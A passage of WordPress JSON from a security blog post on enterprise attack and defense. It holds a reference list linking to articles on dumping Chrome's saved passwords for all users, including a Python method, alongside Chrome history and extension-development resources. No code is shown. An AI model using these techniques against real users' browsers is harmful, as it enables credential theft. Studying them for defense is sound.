noopener\">https:\/\/3gstudent.github.io\/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E5%AF%BC%E5%87%BAChrome%E6%B5%8F%E8%A7%88%E5%99%A8%E4%B8%AD%E4%BF%9D%E5%AD%98%E7%9A%84%E5%AF%86%E7%A0%81<\/a><\/p>\n\n\n\n<p>\u5947\u5b89\u4fe1\u653b\u9632\u793e\u533a-\u6293\u53d6Chrome\u6240\u6709\u7248\u672c\u5bc6\u7801<br><a href=\"https:\/\/forum.butian.net\/share\/591\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/forum.butian.net\/share\/591<\/a><\/p>\n\n\n\n<p>\u83b7\u53d6\u5f53\u524d\u7cfb\u7edf\u6240\u6709\u7528\u6237\u7684\u8c37\u6b4c\u6d4f\u89c8\u5668\u5bc6\u7801<br><a href=\"https:\/\/blog.csdn.net\/weixin_44216796\/article\/details\/113761631\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/blog.csdn.net\/weixin_44216796\/article\/details\/113761631<\/a><\/p>\n\n\n\n<p>Python\u83b7\u53d6Chrome\u6d4f\u89c8\u5668\u5df2\u4fdd\u5b58\u7684\u6240\u6709\u8d26\u53f7\u5bc6\u7801<br><a href=\"https:\/\/www.lijiejie.com\/python-get-chrome-all-saved-passwords\/\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/www.lijiejie.com\/python-get-chrome-all-saved-passwords\/<\/a><\/p>\n\n\n\n<p>\u6d4f\u89c8\u5668\u5bfc\u51fa\u5bc6\u7801<br><a href=\"https:\/\/yinhaoqin.com\/%E5%9F%9F%E5%AE%89%E5%85%A8\/%E6%94%BB%E5%87%BB%E6%88%98%E6%9C%AF\/%E6%B5%8F%E8%A7%88%E5%99%A8%E5%AF%BC%E5%87%BA%E5%AF%86%E7%A0%81\/\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/yinhaoqin.com\/%E5%9F%9F%E5%AE%89%E5%85%A8\/%E6%94%BB%E5%87%BB%E6%88%98%E6%9C%AF\/%E6%B5%8F%E8%A7%88%E5%99%A8%E5%AF%BC%E5%87%BA%E5%AF%86%E7%A0%81\/<\/a><\/p>\n\n\n\n<p>How to Convert Chrome Browser History Sqlite Timestamps with Osquery<br><a href=\"https:\/\/stackoverflow.com\/questions\/61197346\/how-to-convert-chrome-browser-history-sqlite-timestamps-with-osquery\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/stackoverflow.com\/questions\/61197346\/how-to-convert-chrome-browser-history-sqlite-timestamps-with-osquery<\/a><\/p>\n\n\n\n<p>&#8211;load-extension parameter for chrome doesn&#8217;t work<br><a href=\"https:\/\/stackoverflow.com\/questions\/25064523\/load-extension-parameter-for-chrome-doesnt-work\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/stackoverflow.com\/questions\/25064523\/load-extension-parameter-for-chrome-doesnt-work<\/a><\/p>\n\n\n\n<p>Chrome \u6269\u5c55\u7f16\u5199\u5165\u95e8<br><a href=\"https:\/\/developer.chrome.com\/docs\/extensions\/mv3\/getstarted\/\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/developer.chrome.com\/docs\/extensions\/mv3\/getstarted\/<\/a><\/p>\n\n\n\n<p>10\u5206\u949f\u5165\u95e8chrome(\u8c37\u6b4c)\u6d4f\u89c8\u5668\u63d2\u4ef6\u5f00\u53d1<br><a href=\"https:\/\/juejin.cn\/post\/6904797929056239630\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/juejin.cn\/post\/6904797929056239630<\/a><\/p>\n\n\n\n<p>\u4ece\u96f6\u6df1\u5165Chrome\u63d2\u4ef6\u5f00\u53d1<br><a href=\"https:\/\/xieyufei.com\/2021\/11\/09\/Chrome-Plugin.html\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/xieyufei.com\/2021\/11\/09\/Chrome-Plugin.html<\/a><\/p>\n\n\n\n<p>=END=<\/p>\n","protected":false},"excerpt":{"rendered":"<p>=Start= \u7f18\u7531\uff1a \u7b80\u5355\u6574\u7406\u4e00\u4e0b\u524d\u6bb5\u65f6\u95f4\u770b\u5230\u7684\u548c\u4f01\u4e1a\u5b89\u5168\u653b\u9632\u76f8\u5173\u7684\u5185\u5bb9\u3002\u8fd9\u6b21\u4e3b\u8981\u4ecb\u7ecdChrome\u6d4f\u89c8\u5668\u4e2d\u5b58 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[23,25,12],"tags":[285,795,724,1302,1856],"class_list":["post-5333","post","type-post","status-publish","format-standard","hentry","category-knowledgebase-2","category-security","category-tools","tag-chrome","tag-websocket","tag-724","tag-1302","tag-1856"],"views":9550,"_links":{"self":[{"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/posts\/5333","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/comments?post=5333"}],"version-history":[{"count":1,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/posts\/5333\/revisions"}],"predecessor-version":[{"id":5334,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/posts\/5333\/revisions\/5334"}],"wp:attachment":[{"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/media?parent=5333"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/categories?post=5333"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/tags?post=5333"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}